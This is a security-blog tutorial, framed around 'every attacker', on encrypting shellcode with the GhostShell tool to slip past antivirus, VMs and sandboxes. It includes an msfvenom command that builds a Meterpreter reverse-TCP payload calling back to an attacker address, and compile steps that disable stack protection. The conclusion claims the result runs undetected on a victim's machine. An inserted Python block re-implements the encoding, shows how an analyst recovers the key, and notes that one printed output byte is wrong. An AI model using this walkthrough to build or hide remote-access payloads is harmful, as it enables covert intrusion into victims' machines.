Generate Shellcode to Bypass the AVs, VMs, and Sandboxes

Introduction

Shellcode is the next phase after successfully finding an exploit. Every attacker needs shellcode to compromise the target, and the shellcode determines how much control you get over the victim. Shellcode encryption also plays a big role in hiding malware from antivirus, VMs and sandboxes.

Today we will walk you through a technique for encrypting your shellcode; similar techniques are used by researchers of the International Institute of Cyber Security to test malware in labs.

Environment

  • OS: Kali Linux 2019.3 64bit
  • Kernel-Version: 5.2.0

Installation Steps

root@kali:/home/iicybersecurity# git clone https://github.com/ReddyyZ/GhostShell
Cloning into 'GhostShell'...
remote: Enumerating objects: 27, done.
remote: Counting objects: 100% (27/27), done.
remote: Compressing objects: 100% (27/27), done.
remote: Total 185 (delta 15), reused 0 (delta 0), pack-reused 158
Receiving objects: 100% (185/185), 4.49 MiB | 1.60 MiB/s, done.
Resolving deltas: 100% (91/91), done.
  • Use the cd command to enter the GhostShell directory.
root@kali:/home/iicybersecurity# cd GhostShell/
root@kali:/home/iicybersecurity/GhostShell#
  • We use msfvenom, a command-line tool, to generate and output shellcode in different formats.
  • Now, let's generate shellcode with msfvenom using this command:
    • msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=80 -f c
GhostShell - Shell code
  • We have successfully generated shellcode.
  • Now, use this command to compile the project's source file:
    • gcc -m32 -fno-stack-protector -z execstack encrypt_shellcode.c -o encrypt_shellcode
  • This command produces the encrypt_shellcode binary. Use the ls command to view the file.
root@kali:/home/iicybersecurity/GhostShell# gcc -m32 -fno-stack-protector -z execstack encrypt_shellcode.c -o encrypt_shellcode
root@kali:/home/iicybersecurity/GhostShell# ls
assets encrypt_shellcode encrypt_shellcode.c LICENSE main.c main.h README.md
  • Let's assume that the following is our shellcode.
\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1
  • Now we can encrypt the shellcode using this command:
    • Command format: ./encrypt_shellcode e "key" "shellcode"
    • e: encrypt the shellcode
    • key: \xde\xad\xbe\xef
root@kali:/home/iicybersecurity/GhostShell# ./encrypt_shellcode e "\xde\xad\xbe\xef" "\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"
Encrypted: \x4e\xac\xbd\xee\xc7\x48\xbd\xee\xdd\xad\x81\x18\xa4\x22\x7f
  • Now we can decrypt the shellcode using this command:
    • Command format: ./encrypt_shellcode d "key" "shellcode"
    • d: decrypt the shellcode
root@kali:/home/iicybersecurity/GhostShell# ./encrypt_shellcode d "\xde\xad\xbe\xef" "\x4e\xac\xbd\xee\xc7\x48\xbd\xee\xdd\xad\x81\x18\xa4\x22\x7f"
Decrypted: \x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1
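The transform the two commands above apply, as an added example that is not GhostShell's own code: a re-implementation inferred from the sample output, together with the known-plaintext key recovery an analyst uses to undo such an encoding. Assumptions: the tool adds each byte of the repeating key to the corresponding payload byte modulo 256 (this reproduces 14 of the 15 printed bytes; the page's tenth byte differs by one), and the GhostShell source itself was not consulted.

```python
# Added example (not GhostShell's code): repeating-key byte addition as
# inferred from the page's sample, plus known-plaintext key recovery.
# ASSUMPTION: encrypt = (payload[i] + key[i % len(key)]) mod 256.


def encode(data: bytes, key: bytes) -> bytes:
    """Byte-wise addition of a repeating key, mod 256 (tool mode 'e')."""
    return bytes((b + key[i % len(key)]) & 0xFF for i, b in enumerate(data))


def decode(data: bytes, key: bytes) -> bytes:
    """Inverse: byte-wise subtraction of the repeating key (tool mode 'd')."""
    return bytes((b - key[i % len(key)]) & 0xFF for i, b in enumerate(data))


def recover_key(cipher: bytes, known_plain: bytes, key_len: int) -> bytes:
    """Known-plaintext recovery: because the transform is a plain addition,
    key_len bytes of known original payload give each key byte directly as
    cipher - plain at that offset. A short repeating key hides nothing once
    any fragment of the payload is known."""
    if len(known_plain) < key_len:
        raise ValueError("need at least key_len bytes of known plaintext")
    return bytes((cipher[i] - known_plain[i]) & 0xFF for i in range(key_len))


def to_c_escapes(data: bytes) -> str:
    """Render bytes in the \\xNN form the tool prints."""
    return "".join(f"\\x{b:02x}" for b in data)


# Sample payload and key taken from the page (the 15-byte stand-in shellcode
# and the key \xde\xad\xbe\xef), written as hex for readability.
PAGE_PLAIN = bytes.fromhex("70ffffffe99bffffff01c329c675c1")
PAGE_KEY = bytes.fromhex("deadbeef")

if __name__ == "__main__":
    enc = encode(PAGE_PLAIN, PAGE_KEY)
    print("Encrypted:", to_c_escapes(enc))
    print("Decrypted:", to_c_escapes(decode(enc, PAGE_KEY)))
    # An analyst who knows only the first four payload bytes gets the key back.
    print("Recovered key:", to_c_escapes(recover_key(enc, PAGE_PLAIN[:4], 4)))
```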

Conclusion

We saw how to encrypt and decrypt shellcode using a unique key. When the encrypted shellcode executes on the victim's machine, it goes undetected on that remote machine.